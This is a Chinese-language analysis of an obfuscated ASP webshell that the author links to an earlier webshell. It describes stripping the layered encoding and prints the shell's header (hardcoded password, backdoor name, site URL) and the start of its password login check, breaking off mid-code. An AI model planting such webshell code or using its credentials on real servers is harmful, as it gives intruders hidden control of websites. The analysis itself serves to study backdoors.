先看看这个shell的截图
之所以拿这个shell出来时因为这个shell和先前的”一个人的战争”webshell有着关系,在那片文章我猜测那个shell是后来去后门然后再加的,我想现在的这个shell极有可能就是那个原始版本。这个shell是十三的加密,和”一个人的战争”webshell结构各方面基本上一直,只是在css方面有些差别,界面不同而已。
shell显示十三的函数加密,然后VBScript.Encode加密,层层剥离就ok。
现在说说这个shell
shell的头部
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
UserPass=”khdwu945046″ ‘密码
mName=”h4ckF1y” ‘后门名字
SiteURL=”Http://wWw.sLenk.Net” ‘网站
Copyright=”注:请勿用于非法用途,否则后果作者概不负责。” ‘版权
这个应当是lenk联盟的东西吧。
说说shell
登录方式
if session(“web2a2dmin”)<>UserPass then
if request.form(“pass”)<>“” then
if request.form(“pass”)=UserPass then
session(“web2a2dmin”)=UserPass
response.redirect url
else
rrs”非法登录”
end if
else
si=”